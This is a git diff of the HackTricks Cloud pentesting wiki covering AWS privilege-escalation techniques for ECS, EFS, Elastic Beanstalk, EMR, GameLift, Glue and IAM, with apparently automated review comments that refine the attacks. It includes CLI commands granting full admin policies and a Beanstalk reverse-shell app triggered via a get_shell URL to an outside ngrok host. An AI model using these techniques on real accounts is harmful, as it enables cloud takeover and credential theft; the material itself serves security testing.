@@ -226,9 +210,8 @@ TODO: Is it possible to register an instance from a different AWS account so tas ### `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, `ecs:DescribeTaskSets` -{% hint style="info" %} -TODO: Test this -{% endhint %} +> [!NOTE] +> TODO: Test this An attacker with the permissions `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, and `ecs:DescribeTaskSets` can **create a malicious task set for an existing ECS service and update the primary task set**. This allows the attacker to **execute arbitrary code within the service**. @@ -262,19 +245,6 @@ aws ecs update-service-primary-task-set --cluster existing-cluster --service exi ## References -* [https://ruse.tech/blogs/ecs-attack-methods](https://ruse.tech/blogs/ecs-attack-methods) +- [https://ruse.tech/blogs/ecs-attack-methods](https://ruse.tech/blogs/ecs-attack-methods) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md similarity index 56% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md index 566ce8d05..821263148 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md @@ -1,27 +1,14 @@ # AWS - EFS Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## EFS More **info about EFS** in: -{% content-ref url="../aws-services/aws-efs-enum.md" %} -[aws-efs-enum.md](../aws-services/aws-efs-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-efs-enum.md +{{#endref}} Remember that in order to mount an EFS you need to be in a subnetwork where the EFS is exposed and have access to it (security groups). Is this is happening, by default, you will always be able to mount it, however, if it's protected by IAM policies you need to have the extra permissions mentioned here to access it. @@ -42,7 +29,7 @@ To change it: aws efs put-file-system-policy --file-system-id --policy file:///tmp/policy.json // Give everyone trying to mount it read, write and root access -// policy.json: +// policy.json: { "Version": "2012-10-17", "Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763", @@ -106,17 +93,4 @@ aws efs modify-mount-target-security-groups \ **Potential Impact:** Indirect privesc by locating sensitive information in the file system. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md similarity index 54% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md index fc4a278bf..e974efeb9 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md @@ -1,37 +1,22 @@ # AWS - Elastic Beanstalk Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Elastic Beanstalk More **info about Elastic Beanstalk** in: -{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %} -[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-elastic-beanstalk-enum.md +{{#endref}} -{% hint style="warning" %} -In order to perform sensitive actions in Beanstalk you will need to have a **lot of sensitive permissions in a lot of different services**. You can check for example the permissions given to **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`** -{% endhint %} +> [!WARNING] +> In order to perform sensitive actions in Beanstalk you will need to have a **lot of sensitive permissions in a lot of different services**. You can check for example the permissions given to **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`** ### `elasticbeanstalk:RebuildEnvironment`, S3 write permissions & many others With **write permissions over the S3 bucket** containing the **code** of the environment and permissions to **rebuild** the application (it's needed `elasticbeanstalk:RebuildEnvironment` and a few more related to `S3` , `EC2` and `Cloudformation`), you can **modify** the **code**, **rebuild** the app and the next time you access the app it will **execute your new code**, allowing the attacker to compromise the application and the IAM role credentials of it. -{% code overflow="wrap" %} ```bash # Create folder mkdir elasticbeanstalk-eu-west-1-947247140022 
@@ -46,62 +31,56 @@ aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247 # Rebuild env aws elasticbeanstalk rebuild-environment --environment-name "env-name" ``` -{% endcode %} ### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, and more... The mentioned plus several **`S3`**, **`EC2`, `cloudformation`** ,**`autoscaling`** and **`elasticloadbalancing`** permissions are the necessary to create a raw Elastic Beanstalk scenario from scratch. -* Create an AWS Elastic Beanstalk application: +- Create an AWS Elastic Beanstalk application: ```bash aws elasticbeanstalk create-application --application-name MyApp ``` -* Create an AWS Elastic Beanstalk environment ([**supported platforms**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)): +- Create an AWS Elastic Beanstalk environment ([**supported platforms**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)): -{% code overflow="wrap" %} ```bash aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role ``` -{% endcode %} If an environment is already created and you **don't want to create a new one**, you could just **update** the existent one. -* Package your application code and dependencies into a ZIP file: +- Package your application code and dependencies into a ZIP file: ```python zip -r MyApp.zip . 
``` -* Upload the ZIP file to an S3 bucket: +- Upload the ZIP file to an S3 bucket: ```python aws s3 cp MyApp.zip s3://elasticbeanstalk--/MyApp.zip ``` -* Create an AWS Elastic Beanstalk application version: +- Create an AWS Elastic Beanstalk application version: -{% code overflow="wrap" %} ```css aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk--",S3Key="MyApp.zip" ``` -{% endcode %} -* Deploy the application version to your AWS Elastic Beanstalk environment: +- Deploy the application version to your AWS Elastic Beanstalk environment: -{% code overflow="wrap" %} ```bash aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0 ``` -{% endcode %} ### `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `cloudformation:GetTemplate`, `cloudformation:DescribeStackResources`, `cloudformation:DescribeStackResource`, `autoscaling:DescribeAutoScalingGroups`, `autoscaling:SuspendProcesses`, `autoscaling:SuspendProcesses` First of all you need to create a **legit Beanstalk environment** with the **code** you would like to run in the **victim** following the **previous steps**. Potentially a simple **zip** containing these **2 files**: -{% tabs %} -{% tab title="application.py" %} +{{#tabs }} +{{#tab name="application.py" }} + ```python from flask import Flask, request, jsonify import subprocess,os, socket @@ -133,9 +112,11 @@ def search(): if __name__=="__main__": application.run() ``` -{% endtab %} -{% tab title="requirements.txt" %} +{{#endtab }} + +{{#tab name="requirements.txt" }} + ``` click==7.1.2 Flask==1.1.2 
@@ -144,47 +125,47 @@ Jinja2==2.11.3 MarkupSafe==1.1.1 Werkzeug==1.0.1 ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} Once you have **your own Beanstalk env running** your rev shell, it's time to **migrate** it to the **victims** env. To so so you need to **update the Bucket Policy** of your beanstalk S3 bucket so the **victim can access it** (Note that this will **open** the Bucket to **EVERYONE**): ```json { - "Version": "2008-10-17", - "Statement": [ - { - "Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "s3:ListBucket", - "s3:ListBucketVersions", - "s3:GetObject", - "s3:GetObjectVersion", - "s3:*" - ], - "Resource": [ - "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022", - "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*" - ] - }, - { - "Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b", - "Effect": "Deny", - "Principal": { - "AWS": "*" - }, - "Action": "s3:DeleteBucket", - "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022" - } - ] + "Version": "2008-10-17", + "Statement": [ + { + "Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": [ + "s3:ListBucket", + "s3:ListBucketVersions", + "s3:GetObject", + "s3:GetObjectVersion", + "s3:*" + ], + "Resource": [ + "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022", + "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*" + ] + }, + { + "Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b", + "Effect": "Deny", + "Principal": { + "AWS": "*" + }, + "Action": "s3:DeleteBucket", + "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022" + } + ] } ``` -{% code overflow="wrap" %} ```bash # Use a new --version-label # Use the bucket from your own account 
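Review bot: The bucket policy in this hunk grants `s3:*` to `"AWS": "*"`, and the surrounding text admits this opens the attacker's bucket to EVERYONE; only the victim account needs to read the bundle, so scoping the principal to `"AWS": "arn:aws:iam::<victim-account-id>:root"` achieves the same migration without publishing the payload to the whole internet and without an `s3:*` grant that also allows deletion. The `Action` list is redundant as written, since `s3:*` already subsumes `s3:ListBucket` and `s3:GetObject*`; trimming it to `s3:ListBucket`, `s3:GetObject` and `s3:GetObjectVersion` should suffice for `create-application-version` to fetch the bundle (verify on a test environment). The hard-coded bucket `elasticbeanstalk-us-east-1-947247140022` is the author's own example account, so a placeholder such as `elasticbeanstalk-<region>-<attacker-account-id>` would make clear that readers must substitute their own.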
@@ -196,23 +177,9 @@ aws elasticbeanstalk update-environment --environment-name MyEnv --version-label # To get your rev shell just access the exposed web URL with params such as: http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528 -Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance). +Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance). -The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections. +The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections. ``` -{% endcode %} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md new file mode 100644 index 000000000..c901b22ea --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md 
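Review bot: The two prose paragraphs in this hunk ("Alternatively, [MaliciousBeanstalk]..." and "The developer has intentions...") sit before the closing ``` fence, so on the new side they still render inside the bash code block, and the GuardDuty caveat about using instance-profile credentials off the EC2 instance is exactly the warning readers should see as text rather than as commented-out shell. Moving the closing fence to directly after the `http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=...&port=...` line fixes the rendering. The hunk itself only strips trailing whitespace from those lines, so the misplaced fence predates this commit.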
@@ -0,0 +1,64 @@ +# AWS - EMR Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## EMR + +More **info about EMR** in: + +{{#ref}} +../aws-services/aws-emr-enum.md +{{#endref}} + +### `iam:PassRole`, `elasticmapreduce:RunJobFlow` + +An attacker with these permissions can **run a new EMR cluster attaching EC2 roles** and try to steal its credentials.\ +Note that in order to do this you would need to **know some ssh priv key imported in the account** or to import one, and be able to **open port 22 in the master node** (you might be able to do this with the attributes `EmrManagedMasterSecurityGroup` and/or `ServiceAccessSecurityGroup` inside `--ec2-attributes`). + +```bash +# Import EC2 ssh key (you will need extra permissions for this) +ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N "" +chmod 400 /tmp/sshkey +base64 /tmp/sshkey.pub > /tmp/pub.key +aws ec2 import-key-pair \ + --key-name "privesc" \ + --public-key-material file:///tmp/pub.key + + +aws emr create-cluster \ + --release-label emr-5.15.0 \ + --instance-type m4.large \ + --instance-count 1 \ + --service-role EMR_DefaultRole \ + --ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc + +# Wait 1min and connect via ssh to an EC2 instance of the cluster) +aws emr describe-cluster --cluster-id +# In MasterPublicDnsName you can find the DNS to connect to the master instance +## You cna also get this info listing EC2 instances +``` + +Note how an **EMR role** is specified in `--service-role` and a **ec2 role** is specified in `--ec2-attributes` inside `InstanceProfile`. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role. + +**Potential Impact:** Privesc to the EC2 service role specified. 
+ +### `elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole` + +With these permissions an attacker can go to the **AWS console**, create a Notebook and access it to steal the IAM Role. + +> [!CAUTION] +> Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related. + +**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile + +### `elasticmapreduce:OpenEditorInConsole` + +Just with this permission an attacker will be able to access the **Jupyter Notebook and steal the IAM role** associated to it.\ +The URL of the notebook is `https://.emrnotebooks-prod.eu-west-1.amazonaws.com//lab/` + +> [!CAUTION] +> Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related + +**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md new file mode 100644 index 000000000..5743a2663 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md 
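Review bot: The `iam:PassRole`, `elasticmapreduce:RunJobFlow` example leaves the attacker-created cluster running; every EC2 node keeps billing and stays visible in the victim's console until terminated, so the snippet should end with a cleanup line such as `aws emr terminate-clusters --cluster-ids <cluster-id>` once the credentials have been pulled from the master node. The two notebook sections state **Potential Impact:** as a privesc to `arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile`, yet the CAUTION admonitions directly above say that in testing only AWS-managed credentials were obtained and not the attached role's; since the text itself describes that profile as AWS-managed, the impact line does not describe an escalation inside the target account and should be reworded along the lines of `**Potential Impact:** Unclear — in testing only AWS-managed credentials were obtained; retest whether the IAM role attached to the notebook is reachable.` Minor: "You cna also get this info" and "but no the EMR IAM Role" are typos in the new text (`can`, `not`).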
@@ -0,0 +1,18 @@ +# AWS - Gamelift + +{{#include ../../../banners/hacktricks-training.md}} + +### `gamelift:RequestUploadCredentials` + +With this permission an attacker can retrieve a **fresh set of credentials for use when uploading** a new set of game build files to Amazon GameLift's Amazon S3. It'll return **S3 upload credentials**. + +```bash +aws gamelift request-upload-credentials \ + --build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111 +``` + +## References + +- [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md similarity index 60% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md index 29164911d..d6cf29c3c 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md @@ -1,19 +1,6 @@ # AWS - Glue Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
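Review bot: The new Gamelift page never says what the returned credentials are good for, which is the security-relevant point: `request-upload-credentials` returns temporary keys scoped to the build's storage location in a GameLift-owned bucket (the response also carries the `StorageLocation` bucket and key), so the realistic outcome is replacing the game-server build that fleets will run, not general S3 access. A line such as `**Potential Impact:** Upload/overwrite the build's files in the GameLift S3 storage location, i.e. tamper with the game-server binary that fleets deploy.` would make that concrete. The `build-id` must be known first; it is enumerated with `aws gamelift list-builds` (`gamelift:ListBuilds`), which is worth stating as the prerequisite. Whether a build whose upload already completed can still be overwritten this way is not something I can confirm from the page, so that caveat should be hedged if added.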
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## glue @@ -100,19 +87,6 @@ Just with the update permission an attacked could steal the IAM Credentials of t ## References -* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) +- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md similarity index 69% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md index bc19f1341..657a16a48 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md @@ -1,27 +1,14 @@ # AWS - IAM Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## IAM For more info about IAM check: -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-iam-enum.md +{{#endref}} ### **`iam:CreatePolicyVersion`** @@ -86,11 +73,9 @@ Allows enabling a disabled access key, potentially leading to unauthorized acces **Exploit:** -{% code overflow="wrap" %} ```bash aws iam update-access-key --access-key-id --status Active --user-name ``` -{% endcode %} **Impact:** Direct privilege escalation by reactivating access keys. @@ -100,19 +85,15 @@ Enables generating or resetting credentials for specific AWS services (e.g., Cod **Exploit for Creation:** -{% code overflow="wrap" %} ```bash aws iam create-service-specific-credential --user-name --service-name ``` -{% endcode %} **Exploit for Reset:** -{% code overflow="wrap" %} ```bash aws iam reset-service-specific-credential --service-specific-credential-id ``` -{% endcode %} **Impact:** Direct privilege escalation within the user's service permissions. @@ -161,18 +142,14 @@ You can use a policy like: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": [ - "*" - ], - "Resource": [ - "*" - ] - } - ] + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": ["*"], + "Resource": ["*"] + } + ] } ``` @@ -184,11 +161,9 @@ Enables adding oneself to an IAM group, escalating privileges by inheriting the **Exploit:** -{% code overflow="wrap" %} ```bash aws iam add-user-to-group --group-name --user-name ``` -{% endcode %} **Impact:** Direct privilege escalation to the level of the group's permissions. 
@@ -207,16 +182,16 @@ Where the policy looks like the following, which gives the user permission to as ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": "sts:AssumeRole", - "Principal": { - "AWS": "$USER_ARN" - } - } - ] + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": "sts:AssumeRole", + "Principal": { + "AWS": "$USER_ARN" + } + } + ] } ``` @@ -275,15 +250,13 @@ aws iam update-saml-provider --saml-metadata-document --saml-provider-ar aws iam update-saml-provider --saml-metadata-document --saml-provider-arn ``` -{% hint style="info" %} -TODO: A Tool capable of generating the SAML metadata and login with a specified role -{% endhint %} +> [!NOTE] +> TODO: A Tool capable of generating the SAML metadata and login with a specified role ### `iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:`**`GetOpenIDConnectProvider`**) (Unsure about this) If an attacker has these **permissions** he could add a new **Thumbprint** to manage to login in all the roles trusting the provider. -{% code overflow="wrap" %} ```bash # List providers aws iam list-open-id-connect-providers 
@@ -292,23 +265,9 @@ aws iam get-open-id-connect-provider --open-id-connect-provider-arn # Update Thumbprints (The thumbprint is always a 40-character string) aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3 ``` -{% endcode %} ## References -* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) +- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md new file mode 100644 index 000000000..9003c400a --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md 
